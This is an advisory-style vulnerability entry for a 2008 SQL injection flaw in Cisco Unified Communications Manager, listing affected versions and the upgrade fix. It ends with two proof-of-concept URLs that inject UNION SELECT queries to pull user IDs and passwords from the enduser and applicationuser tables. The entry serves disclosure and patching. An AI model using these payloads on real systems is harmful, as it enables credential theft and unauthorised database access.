Cisco Unified Communications Manager SQL Injection Vulnerability

vendor:

Unified Communications Manager

by:

SecurityFocus

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Unified Communications Manager

Affected Version From: Cisco Unified Communication Manager 5.0/5.1 prior to 5.1(3a)

Affected Version To: Cisco Unified Communication Manager 6.0/6.1 prior to 6.1(1a)

Patch Exists: YES

Related CWE: N/A

CPE: cisco:unified_communications_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Cisco Unified Communications Manager SQL Injection Vulnerability

Cisco Unified Communications Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Upgrade to Cisco Unified Communication Manager 5.1(3a) or 6.1(1a) or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27775/info

Cisco Unified Communications Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue is tracked by Cisco bug ID CSCsk64286.

This issue affects the following:

Cisco Unified Communication Manager 5.0/5.1 prior to 5.1(3a)
Cisco Unified Communication Manager 6.0/6.1 prior to 6.1(1a)

https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','',firstname,lastname,userid,password+from+enduser;--

https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','','',user,'',password+from+applicationuser;--